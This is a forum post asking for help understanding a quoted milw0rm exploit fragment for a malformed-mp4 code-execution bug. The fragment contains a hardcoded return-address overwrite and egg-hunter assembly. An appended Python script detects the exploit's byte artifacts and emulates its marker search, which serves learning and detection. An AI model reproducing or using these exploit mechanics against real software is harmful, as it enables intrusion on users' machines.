It turns out that if we make a malformed mp4 file we can get code execution, and they managed it; here I post the exploit
http://milw0rm.com/exploits/3823
Code:
/*
Code execution is due to a call [eax] where we can control eax, and ecx points to a place
where we can write some instructions. But there is not enough space to put our shellcode.
So the following ret address is in Imagehlp. It points to 0x0108B6FF which is jmp ecx in Ieframe.
Change this to make it work on your box.
*/
memcpy(evilbuff+0x5522,"\x75\x14\xC5\x76",4);
/* As I said there's not enough space there for us but I've noticed another area that can hold our
shellcode. However it doesnt have a fixed location so we have to browse the data section to find it.
I've added a marker (DBCA) at the beginning of the code to find its place and the following code try
to locate it:
b:
mov eax, 41424344
dec ecx
mov edx, [ecx]
cmp edx, eax
je e
jmp b
e:
inc ecx, 4
jmp ecx
*/
As you can see, my doubt is not about the exploit itself but about the way this vuln is exploited. From what I read I don't understand it very well (my poor English), but I get what the author is saying.
Apparently we can control the flow of eax and do a call ecx where we can put code, so he says we take it from the imagehlp dll (I suppose it varies on every Windows) and replace it with 0x0108B6FF, but I still don't fully understand everything, I'm very confused. If anyone knows, please post, thanks :D
Cheers
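An added illustration, not part of the original post or of the milw0rm exploit: a small Python checker that looks for the two file artifacts the exploit comment describes (the fixed 4-byte return address written at offset 0x5522 and the 0x41424344 marker that the search loop walks backwards to find), and that emulates the `dec ecx / cmp [ecx], eax` loop so the reader can see how the marker is located. The function names and the zero-filled sample buffer are assumptions made for this example.

```python
"""Constructed example: detect the artifacts the exploit comment describes
in a QuickTime .mp4 and emulate its backward marker search. No shellcode
is involved; the buffer is a zero-filled stand-in for a real file."""
import struct
from typing import Optional

RET_OFFSET = 0x5522                      # offset used by the exploit's memcpy
RET_BYTES = b"\x75\x14\xC5\x76"          # bytes copied there (little-endian 0x76C51475)
MARKER = struct.pack("<I", 0x41424344)   # value compared against [ecx]; bytes b"DCBA" in memory

def find_marker_backwards(data: bytes, start: int) -> Optional[int]:
    """Emulate the loop from the exploit comment: step a pointer backwards
    from `start` until the 4 bytes at that position equal MARKER, then
    return the position just after the marker (where `jmp ecx` would land).
    Returns None if the marker is never found."""
    pos = start
    while pos > 0:
        pos -= 1                          # dec ecx
        if data[pos:pos + 4] == MARKER:   # mov edx,[ecx] / cmp edx,eax / je e
            return pos + 4                # skip the 4-byte marker, then jmp ecx
    return None

def scan_file_bytes(data: bytes) -> dict:
    """Report whether `data` carries the fixed return address at 0x5522
    and/or the marker anywhere in the file (a cheap triage check)."""
    has_ret = (len(data) >= RET_OFFSET + 4
               and data[RET_OFFSET:RET_OFFSET + 4] == RET_BYTES)
    marker_at = data.find(MARKER)
    return {
        "ret_addr_present": has_ret,
        "marker_offset": marker_at if marker_at >= 0 else None,
        "suspicious": has_ret or marker_at >= 0,
    }

def build_sample() -> bytes:
    """Constructed sample: zero-filled buffer with both artifacts planted."""
    buf = bytearray(0x6000)
    buf[RET_OFFSET:RET_OFFSET + 4] = RET_BYTES
    buf[0x5000:0x5004] = MARKER           # marker placed below the ret slot
    return bytes(buf)

if __name__ == "__main__":
    sample = build_sample()
    print(scan_file_bytes(sample))
    print(hex(find_marker_backwards(sample, RET_OFFSET)))  # 0x5004
```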